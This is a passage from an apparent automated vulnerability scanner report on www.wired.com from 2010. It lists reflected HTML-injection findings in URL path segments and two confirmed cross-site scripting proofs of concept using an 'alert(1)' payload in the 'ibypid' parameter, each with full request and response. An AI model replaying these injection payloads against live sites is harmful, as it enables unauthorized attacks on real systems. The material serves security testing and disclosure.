Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29344
Vary: Accept-Encoding
Cache-Control: max-age=595
Expires: Sun, 21 Nov 2010 23:18:45 GMT
Date: Sun, 21 Nov 2010 23:08:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_modsedc27"><a>e4a182d7a54">
...[SNIP]...

1.568. http://www.wired.com/gadgets/pcs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/pcs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29290"><a>3e97c83f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets29290"><a>3e97c83f0a7/pcs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:18 GMT
Date: Sun, 21 Nov 2010 23:08:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets29290"><a>3e97c83f0a7 ss_pcs">
...[SNIP]...

1.569. http://www.wired.com/gadgets/pcs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/pcs

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea349"><a>abc8fc5b833 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/pcsea349"><a>abc8fc5b833 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:47 GMT
Date: Sun, 21 Nov 2010 23:08:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_pcsea349"><a>abc8fc5b833">
...[SNIP]...

1.570. http://www.wired.com/gadgets/portablemusic [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/portablemusic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139b1"><a>6824c99afe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets139b1"><a>6824c99afe8/portablemusic HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 23:12:16 GMT
Date: Sun, 21 Nov 2010 23:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets139b1"><a>6824c99afe8 ss_portablemusic">
...[SNIP]...

1.571. http://www.wired.com/gadgets/portablemusic [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/portablemusic

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9890b"><a>1a2bf9e403d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/portablemusic9890b"><a>1a2bf9e403d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:08:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_portablemusic9890b"><a>1a2bf9e403d">
...[SNIP]...

1.572. http://www.wired.com/gadgets/wireless [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/wireless

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45461"><a>16a5e5e1666 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets45461"><a>16a5e5e1666/wireless HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:23 GMT
Date: Sun, 21 Nov 2010 23:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets45461"><a>16a5e5e1666 ss_wireless">
...[SNIP]...

1.573. http://www.wired.com/gadgets/wireless [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/wireless

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd750"><a>8d8676eb6a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/wirelessbd750"><a>8d8676eb6a9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=597
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:08:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_wirelessbd750"><a>8d8676eb6a9">
...[SNIP]...

1.574. http://www.wired.com/gaming [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4899"><a>1ca469d09ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaminga4899"><a>1ca469d09ed HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29382
Vary: Accept-Encoding
Cache-Control: max-age=222
Expires: Mon, 22 Nov 2010 01:15:04 GMT
Date: Mon, 22 Nov 2010 01:11:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaminga4899"><a>1ca469d09ed">
...[SNIP]...

1.575. http://www.wired.com/gaming/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b691"><a>f527151e420 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming3b691"><a>f527151e420/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29383
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 20:18:56 GMT
Date: Sun, 21 Nov 2010 20:14:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming3b691"><a>f527151e420">
...[SNIP]...

1.576. http://www.wired.com/gaming/gamingreviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/gamingreviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e36d"><a>49ae0050530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming5e36d"><a>49ae0050530/gamingreviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Sun, 21 Nov 2010 23:12:30 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming5e36d"><a>49ae0050530 ss_gamingreviews">
...[SNIP]...

1.577. http://www.wired.com/gaming/gamingreviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/gamingreviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de64"><a>eaff00508ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/gamingreviews1de64"><a>eaff00508ec HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:07 GMT
Date: Sun, 21 Nov 2010 23:09:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_gamingreviews1de64"><a>eaff00508ec">
...[SNIP]...

1.578. http://www.wired.com/gaming/hardware [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/hardware

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e9a"><a>5d92c74d73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gamingc5e9a"><a>5d92c74d73d/hardware HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29403
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:26 GMT
Date: Sun, 21 Nov 2010 23:08:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gamingc5e9a"><a>5d92c74d73d ss_hardware">
...[SNIP]...

1.579. http://www.wired.com/gaming/hardware [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/hardware

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511f3"><a>a929ebce08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/hardware511f3"><a>a929ebce08d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29403
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:03 GMT
Date: Sun, 21 Nov 2010 23:09:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_hardware511f3"><a>a929ebce08d">
...[SNIP]...

1.580. http://www.wired.com/gaming/virtualworlds [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/virtualworlds

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdcfc"><a>0a261e4d294 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gamingbdcfc"><a>0a261e4d294/virtualworlds HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=226
Expires: Sun, 21 Nov 2010 23:12:23 GMT
Date: Sun, 21 Nov 2010 23:08:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gamingbdcfc"><a>0a261e4d294 ss_virtualworlds">
...[SNIP]...

1.581. http://www.wired.com/gaming/virtualworlds [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/virtualworlds

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bbd"><a>49da4046a0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/virtualworlds97bbd"><a>49da4046a0e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=575
Expires: Sun, 21 Nov 2010 23:18:45 GMT
Date: Sun, 21 Nov 2010 23:09:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_virtualworlds97bbd"><a>49da4046a0e">
...[SNIP]...

1.582. http://www.wired.com/inspiredbyyou/2010/07/electric-car-grid/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/electric-car-grid/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 96627%3balert(1)//343adadbdb2 was submitted in the ibypid parameter. This input was echoed as 96627;alert(1)//343adadbdb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/electric-car-grid/?ibypid=596627%3balert(1)//343adadbdb2 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:33 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=445
Expires: Sun, 21 Nov 2010 23:21:58 GMT
Date: Sun, 21 Nov 2010 23:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 596627;alert(1)//343adadbdb2;</script>
...[SNIP]...

1.583. http://www.wired.com/inspiredbyyou/2010/07/events-calendar [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/events-calendar

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31876%3balert(1)//b8b3883cd7f was submitted in the ibypid parameter. This input was echoed as 31876;alert(1)//b8b3883cd7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/events-calendar?ibypid=231876%3balert(1)//b8b3883cd7f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
